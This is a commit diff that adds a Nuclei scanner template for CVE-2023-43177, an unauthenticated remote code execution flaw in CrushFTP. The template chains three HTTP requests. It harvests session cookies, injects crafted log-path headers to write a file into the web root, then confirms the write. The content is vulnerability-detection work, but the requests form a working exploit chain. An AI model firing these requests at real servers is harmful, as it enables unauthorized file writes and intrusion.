Sandeep Singh
GitHub
parent
0dcd5d1e98
commit
5e01220d71
|
|
@ -0,0 +1,72 @@
|
||||||
|
id: CVE-2023-43177
|
||||||
|
|
||||||
|
info:
|
||||||
|
name: CrushFTP < 10.5.1 - Unauthenticated Remote Code Execution
|
||||||
|
author: iamnoooob,rootxharsh,pdresearch
|
||||||
|
severity: critical
|
||||||
|
description: |
|
||||||
|
CrushFTP prior to 10.5.1 is vulnerable to Improperly Controlled Modification of Dynamically-Determined Object Attributes.
|
||||||
|
reference:
|
||||||
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-43177
|
||||||
|
- https://convergetp.com/2023/11/16/crushftp-zero-day-cve-2023-43177-discovered/
|
||||||
|
- https://blog.projectdiscovery.io/crushftp-rce/
|
||||||
|
classification:
|
||||||
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||||
|
cvss-score: 9.8
|
||||||
|
cve-id: CVE-2023-43177
|
||||||
|
cwe-id: CWE-913
|
||||||
|
epss-score: 0.00106
|
||||||
|
epss-percentile: 0.42673
|
||||||
|
cpe: cpe:2.3:a:crushftp:crushftp:*:*:*:*:*:*:*:*
|
||||||
|
metadata:
|
||||||
|
max-request: 3
|
||||||
|
vendor: crushftp
|
||||||
|
product: crushftp
|
||||||
|
tags: cve,cve2023,crushftp,unauth,rce
|
||||||
|
|
||||||
|
flow: http(1) && http(2) && http(3)
|
||||||
|
|
||||||
|
variables:
|
||||||
|
dirname: "{{randbase(5)}}"
|
||||||
|
filename: "{{randbase(5)}}"
|
||||||
|
|
||||||
|
http:
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/WebInterface"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- contains_all(to_lower(header), "currentauth", "crushauth")
|
||||||
|
|
||||||
|
- method: POST
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/WebInterface/function/?command=getUsername&c2f={{http_1_currentauth}}"
|
||||||
|
|
||||||
|
headers:
|
||||||
|
Cookie: "CrushAuth={{http_1_crushauth}}; currentAuth={{http_1_currentauth}}"
|
||||||
|
as2-to: X
|
||||||
|
user_name: crushadmin{{dirname}}
|
||||||
|
user_log_path: "./WebInterface/{{dirname}}/"
|
||||||
|
user_log_file: "{{filename}}"
|
||||||
|
Content-Type: application/x-www-form-urlencoded
|
||||||
|
|
||||||
|
body: |
|
||||||
|
post=body
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: regex
|
||||||
|
regex:
|
||||||
|
- "crushadmin"
|
||||||
|
|
||||||
|
- method: GET
|
||||||
|
path:
|
||||||
|
- "{{BaseURL}}/WebInterface/{{dirname}}/{{filename}}"
|
||||||
|
|
||||||
|
matchers:
|
||||||
|
- type: dsl
|
||||||
|
dsl:
|
||||||
|
- status_code == 200
|
||||||
|
- contains(body, "crushadmin{{dirname}}")
|
||||||
|
condition: and
|
||||||
Loading…
Reference in New Issue